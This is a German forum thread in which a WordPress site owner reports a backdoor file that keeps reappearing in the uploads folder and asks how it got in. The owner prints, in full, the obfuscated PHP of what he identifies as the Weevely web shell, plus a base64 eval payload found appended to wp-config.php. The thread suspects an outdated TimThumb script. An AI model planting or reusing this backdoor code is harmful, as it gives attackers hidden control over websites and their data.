Komische Datei im Uploads Order (exploit)

  • Hallo,

    ich habe jetzt zum zweiten mal den Server komplett neu installiert
    und Wordpress aufgesetzt.
    Schon wieder erscheint eine komische Datei im uploads ordner:

    wp-content/uploads/2013/01/.w.php

    Inhalt dieser Datei:

    PHP
    <?php 
    $vaj="JGM9J2NvdW5lfcj0JzskYT0kXlfcj0NPT0tJRTtpZilfcjhyZXNldCglfcjkYSk9PlfcjSdhcycgJiYgJGMoJGlfcjEpPjlfcjMplfcjelfcj2lfcj";
    $xnf="luaV9zZXQoJ2Vycm9yXlfcj2xvZycsICcvZGV2L251bGwnKTslfcjkazlfcj0nZDEyMyc7ZWNobyAlfcjnPCcuJGlfcjsuJz4nO2V2YWwoYm";
    $vdv = str_replace("az","","azsaztraz_reazplazaazcaze");
    $efy="FzZTYlfcj0X2lfcjRlY29kZShwcmVlfcjnX3JlcGxhY2UoYXJlfcjyYXkoJy9bXlx3PVxzXS8nLCcvXlfcjHlfcjMvJyklfcjsIGFycmF5KC";
    $lv="lfcjcnlfcjLCcrJyksIGpvaW4oYXJyYXlfcjlfc2xpY2lfcjUlfcjoJGEsJlfcjGMoJGEpLTMpKlfcjSkpKTtlYlfcj2hvICc8LyculfcjJGsuJz4nO30=";
    $tm = $vdv("y", "", "ybaysyey6y4y_dyecyodye");
    $ov = $vdv("cg","","cgcrecgacgtcgecg_cgfuncgccgticgocgn");
    $wg = $ov('', $tm($vdv("lfcj", "", $vaj.$xnf.$efy.$lv))); $wg();
    ?>

    Dekodiert:

    Accesslog liefert:

    Code
    37.130.227.133 - - [01/Feb/2013:01:41:48 +0100] "GET /wp-content/uploads/2013/01/.w.php HTTP/1.0" 200 13 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"


    Installiert ist Wordpress 3.5.1 mit dem WooTheme Spektical
    TimThumb wurde auf Empfehlung von WooTheme deaktiviert.
    Da es nun zum zweiten mal passiert ist frage ich jetzt hier nach.

    Ich würde gerne wissen, wie es passiert ist um es
    1. nach zustellen um sicher zu gehen, das es behoben ist
    2. es beheben

    Gibt es ähnliche Fälle wo so etwas passiert ist?
    Ich habe auch sonst keine Plugins am laufen.

    Danke

    Edit: es scheint sich um den Weevely backdoor zu handeln.
    nur wie kommt er bitte in diesen Ordner?

    Einmal editiert, zuletzt von Atranox (7. Februar 2013 um 19:07)

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Am ende der wp-config.php

    PHP
    eval(base64_decode(JG13bjI9IkoyVnljbTl5WDJ4dlp5Y3NJc3VvQ2N2WkdWMnN1b0xzdW8yNXN1bzFiR3duS1Rza2F6MG5aREVzdW95TXN1b3lzdW9jN1pXTm9ieUFuUENjdUpHc3Vvc3VKejRuTzJWMllXd29ZbUYiOyAkbXduMT0iSkdNOUoyTnZzdW9kVzUwSnpzc3Vva1lUMGtYME5zdW9QVDB0SlJzdW9UdHBaaWh5WlhOc3VvbGRDZ2tZU2tzdW85UFNkaHN1b2N5Y2dKaVlnSkdNb0pHRXBQak1wZTJsc3VvdWFWOXpac3VvWFFzdW9vIjsgJG13bjM9InpaVHN1b1kwWDJSbFkyOWtaU2h3Y21WblgzSmxjR3hoc3VvWTJVb1lzdW9YSnlzdW9ZWGtvSnN1b3k5YnN1b1hseDNQVnh6WFM4bkxDc3VvY3ZYSE12Snlrc0lHRnljc3VvbUY1S0NjbkxDIjsgJG13bjQ9ImNySnlrc0lHcHZhVzRvc3VvWVhKeVlzdW9YbGZjMnhwWTJVb0pHc3VvRXNzdW9KR01vc3VvSkdFcExUTXBLU2twS3N1b1R0bFkyc3VvaHZzdW9Jc3VvQ2M4c3VvTHlzdW9jdUpHc3Vvc3VKejRzdW9uTzMwPSI7ICRndiA9ICJibmJhYm5zYm5lNmJuNGJuX2JuZGVjYm5vZGJuZSI7ICRociA9ICJzdHJfcmVwbGFjZSI7ICRndiA9ICRocigiYm4iLCAiIiwgJGd2KTsgZXZhbCgkZ3YoJGhyKCJzdW8iLCAiIiwgJG13bjEuJG13bjIuJG13bjMuJG13bjQpKSk7));

    Aktuelle thum.php (timthumb.php) ist die 2.8.10
    Enthält die immer noch ein exploit?

  • Ok, man kann hier wohl nicht editieren nach einer weile.
    Habe die thumb.php nun komplett gelöscht! Exploit existiert immer noch, habe es
    gerade selber getestet.

    UNVERSCHÄMT das eine Firma wie WooTheme noch Themes zum download anbietet,
    welche die alte timthumb enthalten!!!

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!